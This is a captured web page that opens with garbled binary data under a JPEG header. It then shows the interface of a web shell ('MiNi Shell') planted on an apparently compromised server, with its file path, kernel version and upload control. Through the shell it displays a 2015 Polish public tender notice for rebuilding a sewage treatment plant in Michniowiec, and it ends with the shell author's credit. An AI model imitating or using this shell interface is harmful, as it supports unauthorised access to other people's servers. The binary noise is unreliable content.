JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150401/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150401/73712-N-2015.html

<p class="kh_header"><b>Czarna: Przebudowa  urządzeń  oczyszczalni  ścieków  wraz  z  odcinkiem  kanalizacji  sanitarnej  w  msc.  Michniowiec,  gm.  Czarna  nr  dz.  172/6,  222/7</b><br>
<b>Numer ogłoszenia: 73712 - 2015; data zamieszczenia: 01.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Czarna , Czarna 260, 38-710 Czarna, woj. podkarpackie, tel. 013 4619009.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.czarna.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.bip.czarna.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa  urządzeń  oczyszczalni  ścieków  wraz  z  odcinkiem  kanalizacji  sanitarnej  w  msc.  Michniowiec,  gm.  Czarna  nr  dz.  172/6,  222/7.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych związanych                          z realizacją zadania pod nazwą:

Przebudowa urządzeń  oczyszczalni  ścieków  wraz  z  odcinkiem  kanalizacji  sanitarnej  w  msc.  Michniowiec,  gm.  Czarna  nr  dz.  172/6,  222/7
    1	Projektowane rozwiązania
W ramach inwestycji projektuje się przebudowę istniejącej   oczyszczalni ścieków. Panuje się przebudowę wstępnego zbiornika osadów, kontenerowej oczyszczalni ścieków oraz przebudo?wę odcinka kanalizacji sanitarnej wraz z wylotem do istniejącego cieku wodnego. Urządzenia i uzbrojenie istniejące wyłączone z eksploatacji przewiduje się do likwidacji po-przez demontaż.
2	Elementy technologiczne oczyszczalni ścieków
2.1.Rurociągi - materiał
Rurociągi technologiczne oraz odcinki kanalizacji sanitarnej projektuje się z:
z rur strukturalnych trójwarstwowych z jednorodnego PP o ścianach obustronnie gładkich,
o sztywności obwodowej SN12.5 o średnicach dn200 mm x 8,0 mm; dn250 mm x 10,1 mm
łączonych za pomocą połączeń kielichowych z uszczelkami wargowymi;
z kształtek strukturalnych trójwarstwowych z jednorodnego PP o ścianach obustronnie
gładkich o średnicach dn200 mm x 8,0 mm; dn250mmx 10,1 mm łączonych za pomocą
połączeń kielichowych z uszczelkami wargowymi;
Rury oraz kształtki musza spełniać wymagania wytrzymałościowe wg ISO 9969.
2.2.Studzienki rewizyjne
Na potrzeby odprowadzania ścieków podczyszczonych do odbiornika projektuje się budowę studni rewizyjnych.
Studzienki wykonać z prefabrykatów betonowych o średnicy wewnętrznej dn1200mm z betonu wibroprasowanego C35/45, w klasie wodoszczelności W-8, nasiąkliwość betonu do 5%, o mrozoodporność F150, łączonych na uszczelki. 
Studnie posadowić na podsypce piaskowej grubości min. 20 cm i podbudowie betonowej-chudy beton w klasie 012/15 o grubości min. 15 cm.
2.3. Osadnik wstępny
Do oczyszczania ścieków komunalnych planuje się montaż osadnika wstępnego oraz biolo-gicznej oczyszczalni ścieków opartej na metodzie osadu czynnego. Projektuje się zbiornik typowy żelbetowy o charakterystycznych parametrach:
pojemność czynna 15 m3
pojemność max. 25 m3   
wymiary   5,0 m(L) x2,0m (B)x2,5m (H)
2.4. Oczyszczalnia ścieków
W celu oczyszcza ścieków sanitarnych projektuje się oczyszczalnię ścieków typ SX-P40 lub równoważną o wydajności 6,0 m3/dobę.
Projektowana oczyszczalnia gwarantuje spełnienie wymagań Rozporządzenia Ministra Środo?
wiska z dn. 24 lipca 2006 r. wraz z późniejszymi zmianami w sprawie warunków, jakie należy spełnić przy wprowadzaniu ścieków do wód lub ziemi.

Parametr	Wartość gwarantowana	Wartość średnia
ChZTcr	            1SO mg/l	35 mg/i
BZT.                      540 mg/l	10 mg/ł
Zawiesina ogólna	      50 mg/l	15 ni g/l
Schemat oczyszczalni:
2.5. Elementy oczyszczalni kontenerowej
Osadnik wstępny i odstojnik (Ows i O)
Ścieki z kanalizacji dopływają do osadnika wstępnego, którego zadaniem jest wyrównanie składu dopływających ścieków oraz zatrzymanie tłuszczy. W danej komorze następuje również wstępna sedymentacja oraz obniżenie temp. ścieków np. z pralni. Osad nadmierny odpompowywany jest pompą zatapialną z KOCZ do drugiej komory osadnika wstępnego, która pełni rolę odstojnika. Ko?mora ta służy do magazynowania osadu, który następnie wywozi się wozem asenizacyjnym poza teren oczyszczalni.
Komora osadu czynnego (KOCZ)
W następnym kroku ścieki przepływają do komory osadu czynnego, przez kosz na skratki umiesz?czony w odpływowej części z osadnika wstępnego. W koszu tym następuje zatrzymywanie pływają?cych zanieczyszczeń. Komora osadu czynnego napowietrzana jest dzięki drobnopęcherzykowemu systemowi napowietrzającemu. Powietrze pod ciśnieniem dostarczane jest przez dmuchawę bocz-nokanałową, umieszczoną bezpośrednio nad zbiornikami,, lub w pobliskim budynku (suterena, ga?raż, magazyn itp.). Dzięki działalności mikroorganizmów w formie osadu czynnego, w warunkach tlenowych dochodzi do usuwania zanieczyszczeń organicznych i azotanowych ze ścieków.
Osadnik wtórny (Ow)
Mieszanina osadu z wodą przepływa do osadnika wtórnego, gdzie dochodzi do separacji osadu od oczyszczonych ścieków. Oczyszczone ścieki zbierane są przez koryto odpływowe z poziomu lustra wody w osadniku, a następnie są odprowadzane do odpływu. Odseparowany, zagęszczony osad z lejowatego dna osadnika pompowany jest pompą mamutową do KOCZ jako osad recyrkulowany. Wyflotowany osad z powierzchni lustra cieczy w osadniku wtórnym (Owt) pompowany jest z powro?tem do KOCZ.
2.6. Opis ciąg technologicznego
Ścieki dopływają do osadnika wstępnego kontenerowej oczyszczalni gdzie zatrzymywane są grube nieczystości, a następnie przez strefę napływu przepływają do komory osadu czynnego. Komora osadu czynnego napowietrzana jest dzięki drobnopęcherzykowemu systemowi napowietrzającemu. Powietrze pod ciśnieniem dostarczane jest przez dmuchawę, umieszczoną bezpośrednio nad zbior?nikami, łub w pobliskim budynku (suterena, garaż, magazyn itp.). Dzięki działalności mikroorgani?zmów w formie osadu czynnego, w warunkach tlenowych dochodzi do usuwania zanieczyszczeń organicznych i azotanowych ze ścieków. Mieszanina osadu z wodą przepływa do osadnika wtórne?go, gdzie dochodzi do separacji osadu od oczyszczonych ścieków. Oczyszczone ścieki odprowa?dzane są poprzez korytko odpływowe do odpływu. Odseparowany, zagęszczony osad z Iejowatego dna osadnika pompowany jest pompą mamutową do komory osadu czynnego (KOCZDN) jako osad recyrkulowany. Wyflotowany osad z powierzchni lustra cieczy w osadniku wtórnym (OWt) pompo?wany jest z powrotem do KOCZ. Osad nadmierny odpompowywany jest pompą zatapialną z KOCZ do drugiej komory osadnika wstępnego, pełniącą rolę odstojnika. Zbiornik ten służy do magazyno?wania osadu, który następnie wywozi się wozem asenizacyjnym poza teren oczyszczalni. Niniejszy osad po ustabilizowaniu i higienizacji nadaje się do rolniczego wykorzystania. Obsługa oczyszczalni sprowadza się do konserwacji urządzeń, okresowej kontroli prawidłowości procesu oczyszczania, utrzymania obiektu w czystości, nadzoru nad wywozem skratek i osadu nadmiernego.
2.7.	Wylot podczyszczonych ścieków do odbiornika
Podczyszczone ścieki z oczyszczalni odprowadzane będą do istniejącego cieku wodnego. Na potrzeby wprowadzania wód projektuje się typowy wylot betonowy. Wylot wykonać z betonu C20/25 na podbudowie z chudego betonu C12/15 grubości 10 cm i podsypce z piasku grubości 15 cm.
2.8.	Umocnienie dna i skarp cieku wodnego
Dia zabezpieczenia brzegów i dna istniejącego cieku wodnego projektuje się zabezpieczenie skarp i dna z płyt betonowych ażurowych układanych na warstwie chudego betonu C12/15 grubości 15 cm.
Umocnienie należy wykonać na długości po 3 m z każdej strony od wylotu i po obu stro?nach rowu..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.11.12.00-6, 45.23.24.00-6, 45.23.22.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 01.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.  Zamawiający wymaga wniesienia wadium w kwocie  3500,00 zł  Słownie: trzy tysiące pięć set złotych
2.  Wadium należy wnieść przed upływem terminu składania ofert, w jednej lub kilku następujących formach :
1)pieniądzu; 
2)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym; (oryginał);
3)gwarancjach bankowych; (oryginał);
4)gwarancjach ubezpieczeniowych; (oryginał);
5)poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5  pkt 2  ustawy z dnia 9 listopada 2000 r o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U.  z 2014r poz. 1804) (oryginał)
Dokumenty w powyższej formie powinny zawierać stwierdzenie , że na pierwsze pisemne żądanie zamawiającego wzywające do zapłaty wadium, zgodnie z warunkami przetargu następuje jego bezwarunkowa wypłata bez jakichkolwiek zastrzeżeń, a w szczególności w przypadkach wystąpienia okoliczności opisanych niżej w p.pkt 12.10 i p.pkt 12.11 SIWZ.
3   Wadium wnoszone w pieniądzu wpłacać należy na  rachunek bankowy zamawiającego  Nr 49 8621 0007 2001 000 1560 0002  Bieszczadzki Bank Spółdzielczy  w Ustrzykach Dolnych z adnotacją - wadium -  Remont oczyszczalni w Michniowcu -   przed upływem terminu składania ofert,  -  tj. tak aby przed otwarciem ofert wadium znajdowało się na rachunku zamawiającego.
4   Potwierdzeniem  formy wniesienia wadium będzie kopia przelewu (wpłaty) lub oryginał innej formy wniesienia wadium załączony do oferty.
5   Zamawiający zwróci wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza,
6   Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwróci wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
7   Zamawiający zwróci niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
8    Zamawiający zażąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie pkt 12.5, jeżeli w wyniku ostatecznego rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego.
9   Jeżeli wadium wniesiono w pieniądzu, zamawiający zwróci je wraz z odsetkami  wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
10  Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, pełnomocnictw, listy   podmiotów należących do tej samej grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt. 3, co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej.
11  Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego  oferta została wybrana:
1) odmówił podpisania umowy w sprawie zamówienia publicznego na   warunkach określonych w ofercie;
2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z  przyczyn leżących po stronie Wykonawcy.
12  Oferta, która nie będzie zabezpieczona wadium , zostanie wykluczona z postępowania. 
13  Wadium dla konsorcjum może być wniesione przez lidera konsorcjum lub przez wskazanego w umowie konsorcjum partnera.
14  Wadium wybranego Wykonawcy zostanie zwrócone w momencie podpisania przez  niego umowy oraz wniesienia wymaganego zabezpieczenia należytego wykonania umowy.
15 Warunki dotyczące zabezpieczenia należytego wykonania umowy podane są w pkt. 21 i projekcie umowy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy :
-  spełniają warunki art. 22 ust.1 uPzp dotyczące :
1) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
2) posiadania wiedzy i doświadczenia;
3) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
4) sytuacji ekonomicznej i finansowej.
-  nie podlegają wykluczeniu na podstawie art. 24 ust. 1,2 i 2a uPzp</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zrealizował w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedno zadanie odpowiadające swoim rodzajem i wartością robót budowlanych w wysokości minimum 50% (netto) stanowiącym przedmiot zamówienia,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponuje personelem posiadającym odpowiednie doświadczenie oraz  udokumentowane kwalifikacje istotne dla robót o charakterze porównywalnym               z niniejszym zamówieniem wymagane ustawą Prawo budowlane tj. osoby do kierowania robotami budowlanymi posiadające uprawnienia kierownika budowy  w branży drogowej oraz zaświadczenie o przynależności do właściwej Okręgowej Izby Inżynierów Budownictwa</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający, określając wymogi w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo budowlane (t. j. Dz. U. z 2013 poz. 1409) oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008 r., Nr 63, poz. 394).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku dotyczącego sytuacji ekonomicznej i finansowej Zamawiający uzna posiadanie przez Wykonawcę ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 150 000,00 złotych (słownie: sto pięćdziesiąt tysięcy złotych),</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Okres Gwarancji - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zakazane są istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, chyba że wystąpią okoliczności które przemawiają za koniecznością zmiany postanowień umowy. Zamawiający na podstawie art.144 ust. 1 ustawy przewiduje możliwość dokonania zmiany umowy w formie aneksów w niżej wymienionych przypadkach:

1. zmiana terminu wykonania zamówienia:
-   w przypadku wystąpienia warunków pogodowych które uniemożliwiają realizację
     zamówienia i spowodują zawieszenie wykonywania robót, w przypadkach:
a)    klęski żywiołowe,
b) wystąpienie nietypowych dla klimatu polskiego warunków atmosferycznych odbiegających od typowych, szczególnie niesprzyjających, uniemożliwiających prowadzenie zamówień/robót budowlanych zgodnie z technologią ich wykonywania, przeprowadzanie prób i sprawdzeń, dokonywanie odbiorów, np. gradobicia, trąby powietrzne, zjawiska niestandardowe w klimacie polskim;
c)    zmiany spowodowane nieprzewidzianymi warunkami geologicznymi, archeologicznymi lub terenowymi, np. niewybuchy i niewypały, wykopaliska uniemożliwiające wykonanie robót;
-   przedłużenie terminu realizacji zamówienia podstawowego na skutek konieczności    wykonania robót dodatkowych, o których mowa w art. 67 ust. 1 pkt 5 p.z.p., których
     wykonanie jest niezbędne dla prawidłowego wykonania oraz zakończenia podstawowego przedmiotu zamówienia wraz ze wszystkimi konsekwencjami występującymi w związku z przedłużeniem tego terminu;
-  konieczność usunięcia błędów lub wprowadzenia zmian w dokumentacji lub specyfikacji technicznej wykonania i odbioru robót;
-   zmiana będąca następstwem okoliczności leżących po stronie Zamawiającego:
a) nieterminowe przekazanie terenu budowy przez Zamawiającego,
b) wstrzymanie robót przez Zamawiającego

Powyższe okoliczności stanowią warunki zmiany umowy, o których mowa 
w art. 144 ust. 1 PZP w przypadku wystąpienia takiej okoliczności.
22.3  Wszelkie zmiany i uzupełnienia treści umowy wymagają formy pisemnej 
w postaci aneksu pod rygorem nieważności.
Podpisanie aneksu do umowy powinno być poprzedzone sporządzeniem protokołu konieczności zawierającego istotne okoliczności potwierdzające konieczność zawarcia aneksu oraz przedstawienie ewentualnych zmian 
w wynagrodzeniu umownym.
22.4  Umowa podlega unieważnieniu w przypadku zaistnienia okoliczności określonych                w art. 140 i 146 PZP.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> ww.bip.czarna.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Czarna
Czarna Górna 74
38-710 Czarna 
pok nr. 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.04.2015 godzina 09:30, miejsce: Gmina Czarna
Czarna Górna 74
38-710 Czarna 
pok nr. 11.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com